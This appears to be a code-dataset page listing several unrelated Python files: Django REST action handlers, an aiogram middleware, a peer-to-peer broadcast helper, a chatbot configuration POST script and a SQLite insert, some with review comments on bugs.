        model_cls
           Model class.
        model_id
           Model ID.
        Returns
        -------
        dict
           Action details.
        """
        resolver = {
            'kwargs': {
                'app': model_cls._meta.app_label,
                'model': model_cls._meta.db_table,
                'id': model_id
            },
            'name': 'rest-api-model-id-action'
        }
        request_obj = RequestData(get_current_request(), **resolver['kwargs'])
        cls_fn = ActionMapper.serialize_actions
        # HTTP POST actions that require no input data
        base_action_cls = [None, EditAction]
        actions = cls_fn(request_obj, model_cls, base_action_cls, 'POST', resolver, include_link_actions=True)
        # HTTP GET actions
        base_action_cls = [None, AbstractModelItemGetAction]
        actions.update(cls_fn(request_obj, model_cls, base_action_cls, 'GET', resolver, include_link_actions=True))
        return actions
class ActionsListingMixin(GetMixin):
    """Mixin that lists the actions available for a model via HTTP GET."""
    def _get(self, request_obj):
        """Return available actions for the model."""
        serialized = ActionsSerializer(request_obj).serialize()
        return ResponseData(serialized)
class ModelActionHandler(ModelActionMixin, RestAPIBasicAuthView):
    """ReST API entry point for executing a model action (auth required)."""
class AppActionHandler(AppActionMixin, RestAPIBasicAuthView):
    """
    ReST API entry point for executing application level action. Action
    requires user authentication.
    """
class AppPublicActionHandler(AppActionMixin, RestAPINoAuthView):
    """
    ReST API entry point for executing public application action.
    No user authentication required.
    """
class ActionsListingHandler(ActionsListingMixin, RestAPIBasicAuthView):
    """
    ReST API entry point for listing actions for application. All actions
    require user authentication.
    """
class ActionsPublicListingHandler(ActionsListingMixin, RestAPINoAuthView):
    """
    ReST API entry point for listing public actions for application. No user
    authentication required for the actions.
    """
class SystemAppsListingHandler(GetMixin, RestAPIBasicAuthView):
    """
    ReST API entry point for listing application models and associated actions.
    """
    def _get(self, request_obj):
        """Collect model actions, app-level actions and UI-only models into one listing."""
        args = request_obj.args
        kwargs = request_obj.kwargs
        # Available models actions (that are associated to some application)
        data = ModelsCollection.serialize()
        for item in data:
            # kwargs is mutated per model before building the per-model request.
            kwargs['app'] = item['app_label']
            kwargs['model'] = item['model']
            obj2 = RequestData(request_obj.request, *args, **kwargs)
            item['actions'] = ActionsSerializer(obj2).serialize()
        # Available application level actions with and without authentication
        for app in AppsCollection.serialize(get_action_response_data):
            data.append(app)
        # UI only application views but enabled from backend
        if hasattr(settings, 'UI_APPLICATION_MODELS'):
            for item in settings.UI_APPLICATION_MODELS:
                for app, _models in item.items():
                    for model in _models:
                        data.append({'app_label': app, 'model': model['name'], 'actions': {}})
        return ResponseData(data)
class SystemAppsPublicListingHandler(RestAPINoAuthView, SystemAppsListingHandler):
    """
    ReST API entry point for listing public APIs.
    """
    def _get(self, request_obj):
        """Filter the full listing down to actions that need no authentication."""
        full_listing = super(SystemAppsPublicListingHandler, self)._get(request_obj).data
        public_data = []
        for item in full_listing:
            # Keep only actions explicitly marked as not requiring auth.
            public_actions = {
                name: details
                for name, details in item['actions'].items()
                if not details.get('authenticate', True)
            }
            if public_actions:
                entry = item.copy()
                entry['actions'] = public_actions
                public_data.append(entry)
        return ResponseData(public_data)
|
993,593 | b14c2b98a07fad5acc877d946f624a0191ab7c48 | from typing import Optional
from aiogram import types
from aiogram.dispatcher.middlewares import BaseMiddleware
from ..models import dbc, User, Chat
class AclMiddleware(BaseMiddleware):
    """Resolve (and lazily create) the DB user/chat rows for every update."""
    async def setup_chat(self, data: dict, tg_user: types.User, tg_chat: Optional[types.Chat] = None):
        """Populate handler *data* with User and Chat rows, creating them on first contact.

        For private chats (tg_chat is None) the user's id doubles as the chat id.
        """
        user_id = tg_user.id
        chat_id = tg_chat.id if tg_chat else tg_user.id
        user = await User.get(user_id)
        if not user:
            user = await dbc.add_new_user(tg_user)
        chat = await Chat.get(chat_id)
        if not chat:
            # NOTE(review): tg_chat may be None here (e.g. a callback query
            # without a message) — confirm dbc.add_new_chat handles None.
            chat = await dbc.add_new_chat(tg_chat)
        data["user"] = user
        data["chat"] = chat
    async def on_pre_process_message(self, message: types.Message, data: dict):
        # Runs before every message handler.
        await self.setup_chat(data, message.from_user, message.chat)
    async def on_pre_process_callback_query(self, query: types.CallbackQuery, data: dict):
        # Runs before every callback-query handler; inline callbacks have no message.
        await self.setup_chat(data, query.from_user, query.message.chat if query.message else None)
993,594 | 453c590063d3a417b02f59c307b059e41ccb0e23 | import socket
import sys
import pickle
from time import sleep
from queue import Queue
from _thread import *
import threading
from threading import Thread
sys.path.append('.\\LinearTopology')
import GLOBALS
import classes
import utility
# Module-level broadcast state: response[i] holds the per-peer replies for
# broadcast number i; num is the id assigned to the next broadcast.
# NOTE(review): mutated from multiple threads without a lock — each thread
# writes a distinct index, which is presumably why this is tolerated; verify.
response = [[]]
num = 0
def addMessage():
    """Initializes the Response list to make sure no old responses were left in it.
    Args:
        None
    Returns:
        None
    Globals:
        response - List to store the responses from the other Super Peers.
        num - Id of the next broadcast; incremented once per call.
    Calls:
        None
    Called by:
        broadcastMsg
    """
    tmp = [[] for x in GLOBALS.SUPER_PEER_LIST]
    global response
    global num
    if num != 0:
        response.append([])
    # NOTE(review): every slot of response[num] aliases the *same* tmp list;
    # broadcastThread overwrites whole slots, so the aliasing appears benign,
    # but confirm no caller mutates a slot in place.
    for x in GLOBALS.SUPER_PEER_LIST:
        response[num].append(tmp)
    num +=1
def broadcastThread(filename, response, id, index):
    """Sends a message to one other Super Peer and records its reply.
    Args:
        filename (Str) - The name of the file to be searched for.
        response (List) - List that will store all of the responses from the super peers.
        id (int) - The index of the broadcast this reply belongs to.
        index (Int) - The index of response to store the answer from the Super Peer in.
    Returns:
        None (the peer's reply is written into response[id][index]).
    Globals:
        GLOBALS.SUPER_PEER_LIST - (ip, port) records for the other peers.
    Calls:
        None
    Called by:
        broadcastMsg()
    """
    ip = GLOBALS.SUPER_PEER_LIST[index][1]
    port = int(GLOBALS.SUPER_PEER_LIST[index][2])
    # BUG FIX: the socket is created before the try so the finally can always
    # close it; the original only closed it on error, leaking a socket per
    # successful broadcast (and referenced a possibly-unbound name on a
    # socket() failure).
    sock = socket.socket()
    try:
        try:
            sock.connect((ip, port))
            msg = pickle.dumps(filename)
            sock.send(msg)
            data = sock.recv(1024)
            data = pickle.loads(data)
            print("[info] Broadcast lib: Response from Super Peer: " + str(index) + " : " + str(data))
            response[id][index] = data
        except socket.error:
            print("[ERROR] Broadcast lib: Error connecting " + str(ip) + ":" + str(port))
    finally:
        sock.close()
    return
def broadcastMsg(filename):
    """Spawns threads to handle messaging the other Super Peers.
    Args:
        filename (Str) - the name of the file to be searched for.
    Returns:
        A list of leaf nodes that have a the file.
    Globals:
        response - List that will store all of the responses form the super peers.
        num - Id assigned to this broadcast (snapshotted before addMessage
              increments it).
    Calls:
        addMessage()
        broadcastThread()
    Called by:
        superPeer.broadcastSearch()
    """
    threads = []
    GLOBALS.BROADCAST_STATUS = 1
    global num
    # Snapshot this broadcast's id before addMessage bumps the counter.
    id = num
    global response
    addMessage()
    for x in range(len(GLOBALS.SUPER_PEER_LIST)):
        # Do not send the query to ourselves.
        if x == GLOBALS.SUPER_PEER_ID:
            continue
        proc = Thread(target = broadcastThread, args = [filename, response, id, x])
        proc.start()
        threads.append(proc)
    #print("[info] Broadcast lib: All threads created")
    # Wait for every peer to answer (or fail) before returning.
    for proc in threads:
        proc.join()
    GLOBALS.BROADCAST_STATUS = 0
    return response[id]
|
993,595 | 756ef23ad9664cec94fe3b80aab66f7e6fca77a4 | from rest_framework import generics
from addons.models import AddOn
from .serializers import AddOnSerializer
from rest_framework.permissions import AllowAny
class AddonsAPIView(generics.ListCreateAPIView):
    """List every AddOn record or create a new one; open to any client."""

    queryset = AddOn.objects.all()
    serializer_class = AddOnSerializer
    permission_classes = [AllowAny]
993,596 | 15cbbe9e8c232b5b545207a9ccc606ed727e63d5 | import requests
import json, os

# Build the target host:port from the environment and POST a bot-builder
# configuration payload to the botbuilder service endpoint.
url = "{0}:{1}".format(os.environ['HOSTNAME'] , "8989")

# NOTE(review): this dict literal repeats several keys ("cb_id", "intent_id",
# "nn_type", "entity_type", "entity_list"). Python keeps only the LAST
# occurrence of a duplicated key, so the earlier "model list" / "intent"
# sections are silently discarded before the request is sent — almost
# certainly not what was intended; each section likely needs its own request
# or nesting. Flagging rather than restructuring (server schema unknown).
resp = requests.post('http://' + url + '/api/v1/type/service/botbuilder/',
                     json={
                         "cb_id" : "cb0001",
                         "chat_cate" : "EP",
                         "chat_sub_cate" : "people",
                         "cb_title" : "chatbot",
                         "cb_desc" : "find_people",
                         "creation_date": "2017-05-22T18:00:00.000",
                         "last_update_date": "2017-05-22T18:00:00.000",
                         "created_by" : "KSS",
                         "last_updated_by" : "KSS",
                         #Model List
                         "cb_id": "cb0001",
                         "nn_id": "lstmcrf0002", #wcnn_ksw01
                         'nn_purpose': "NER", # Intend ADD
                         'nn_type': "bilstmcrf",
                         'nn_label_data': {"entity": ["이름", "직급", "직책", "근태코드", "그룹", "근무조", "업무", "날짜", "장소"]},
                         'nn_desc': "ner",
                         #intent
                         "cb_id": "cb0001",
                         "intent_id": "1",
                         "intent_type": "model",
                         "intent_desc": "",
                         "rule_value": {"key": ["알려줘"]},
                         "nn_type": "Seq2Seq",
                         # #story
                         # 'story_id' : "1",
                         # 'story_desc' : "find_tel",
                         #entity
                         "cb_id": "cb0001",
                         "intent_id": "1",
                         'entity_type' : "key", #(custom/essential/response/default/key)
                         'entity_list' : {"key": ["이름", "직급", "직책", "근태코드", "그룹", "근무조", "업무", "날짜", "장소"]},
                         # entity
                         # "cb_id": "cb0001",
                         # "intent_id": "1",
                         # 'story_id': "1",
                         # 'entity_type': "essential", # (custom/essential/response/default/key)
                         # 'entity_list': {"essential": ["이름"]},
                         # # entity
                         # "cb_id": "cb0001",
                         # "intent_id": "1",
                         # 'story_id': "1",
                         # 'entity_type': "key_values", # (custom/essential/response/default/key)
                         # 'entity_list': {"장소": ["센터", "판교", "포항", "광양"], "직급": ["사원", "대리", "과장", "차장", "부장", "팀장", "사업부장", "상사", "리더"]},
                         #tagging
                         "cb_id": "cb0001",
                         "pos_type": "mecab",
                         "proper_noun": {"tagwc": [1, "/hoya_model_root/chatbot/wc.txt", False], "tagceo": [1, "/hoya_model_root/chatbot/ceo.txt", False], "tagloc": [1, "/hoya_model_root/chatbot/loc.txt", False], "tagorg": [1, "/hoya_model_root/chatbot/org.txt", False], "tagrot": [1, "/hoya_model_root/chatbot/rot.txt", False], "tagdate": [4, "/hoya_model_root/chatbot/super.txt", False], "taghead": [1, "/hoya_model_root/chatbot/head.txt", False], "tagname": [2, "/hoya_model_root/chatbot/name.txt", False], "tagrank": [1, "/hoya_model_root/chatbot/rank.txt", False], "tagcompany": [2, "/hoya_model_root/chatbot/company.txt", False]},
                         #entity relation
                         "cb_id": "cb0001",
                         "entity_id" : "tagname",
                         "entity_uuid" : "asdf",
                         "entity_desc" : "이름",
                     })

# NOTE(review): resp.json() already parses the response body into Python
# objects; json.loads() on top of that only succeeds if the server returns a
# doubly-encoded JSON string — confirm against the service's actual response.
data = json.loads(resp.json())
print("evaluation result : {0}".format(data))
|
993,597 | 289af8ae66f0734d44845e8cd84e1d36867428b8 | ii = [('MartHSI2.py', 1), ('WadeJEB.py', 1), ('NewmJLP.py', 1), ('KirbWPW2.py', 1), ('BachARE.py', 2), ('MartHRW.py', 1), ('BabbCRD.py', 2), ('WilbRLW3.py', 1), ('MartHRW2.py', 1), ('ChalTPW.py', 1), ('KeigTSS.py', 1), ('WaylFEP.py', 3), ('BentJDO.py', 1)] |
993,598 | f1625fcd4ede43241c44d4e4d6295b958e7111c5 | import sqlite3
import os

# NOTE(review): a commented-out Blob helper that relied on the long-removed
# sqlite3.encode() used to live here; sqlite3.Binary below is the supported
# way to store binary data, so the dead code was dropped.

# Absolute paths to the image asset and the target SQLite database.
image_path = '/home/ju/JetBrainsProjects/PycharmProjects/hilar/hilar/src/data/beige2_hat.jpeg'
db_path = '/home/ju/JetBrainsProjects/PycharmProjects/hilar/hilar/db/database.db'

# Read the image once; the context manager guarantees the file is closed.
with open(image_path, 'rb') as f:
    backDrop = sqlite3.Binary(f.read())

# Column values for the new Product row.
# (Renamed from ``id`` so the builtin is not shadowed.)
product_id = 1
original_title = "beige2 hat"
overview = 'look at a beige hat'
vote_average = 1
category = 'hat'
trending = 1
watched = 1

connection = sqlite3.connect(db_path)
try:
    cursor = connection.cursor()
    # Parameterized insert: values are bound by sqlite3, never interpolated.
    cursor.execute('insert into Product (id, original_title, overview,vote_average,backDrop, category, trending, watched) '
                   'values (?,?,?,?,?,?,?,?)',
                   (product_id, original_title, overview, vote_average, backDrop, category, trending, watched))
    connection.commit()
finally:
    # The original script leaked the connection; always close it.
    connection.close()
993,599 | 4bb3e02374cd196187adcc4a7976c44cb7bdb5ed | a=3
b = 4
c = 1000000007  # large prime commonly used as a modulus
# Three-argument pow computes (3 ** b) % c efficiently, replacing the
# hand-written (3*3*3*3) % c and actually using the exponent variable ``b``.
d = pow(3, b, c)
# print() works on Python 3 (and 2); the original bare ``print d`` was
# Python-2-only syntax and is a SyntaxError on Python 3.
print(d)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.